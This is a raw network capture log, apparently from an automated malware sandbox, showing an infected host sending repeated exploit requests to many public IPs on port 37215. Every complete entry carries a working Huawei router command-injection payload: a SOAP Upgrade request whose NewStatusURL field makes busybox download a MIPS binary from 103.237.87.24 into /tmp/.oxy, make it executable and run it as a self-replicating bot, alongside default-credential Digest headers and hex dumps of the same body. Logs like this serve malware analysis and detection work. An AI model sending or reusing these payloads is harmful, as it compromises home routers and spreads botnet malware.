20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1475192.168.2.1346960197.12.249.837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.485920906 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1476192.168.2.1353106157.39.177.22037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.485929966 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1477192.168.2.1351688157.51.196.12237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.485994101 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1478192.168.2.134729841.166.84.12837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.486005068 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1479192.168.2.1339262157.137.7.11237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.486010075 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1480192.168.2.1332890157.175.168.6737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.486022949 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1481192.168.2.1351850187.189.102.13037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.486052036 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1482192.168.2.1360216184.253.144.21237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.486128092 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1483192.168.2.134659041.106.234.24037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.486134052 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1484192.168.2.133580041.132.93.11637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.486144066 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1485192.168.2.134283841.34.81.16037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.486146927 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
